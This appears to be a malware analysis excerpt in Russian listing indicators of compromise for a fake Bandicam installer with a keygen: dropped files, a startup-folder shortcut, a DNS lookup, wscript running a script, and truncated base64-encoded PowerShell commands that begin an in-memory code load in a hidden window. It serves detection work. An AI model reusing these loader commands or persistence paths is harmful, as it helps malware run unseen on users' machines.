Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\chromium.ini.lnk
- %APPDATA%\bandicam.v4.4.3.1557.exe
- %APPDATA%\id.js
- %TEMP%\nsb228e.tmp
- %TEMP%\nsh22af.tmp\kg.exe
- %TEMP%\nsh22af.tmp\repackme.gif
- %TEMP%\nsh22af.tmp\newadvsplash.dll
- %TEMP%\nsh22af.tmp\langdll.dll
- %HOMEPATH%\appdata\chromium.js
- DNS ASK si##j.space
- '%APPDATA%\bandicam.v4.4.3.1557.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\ID.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...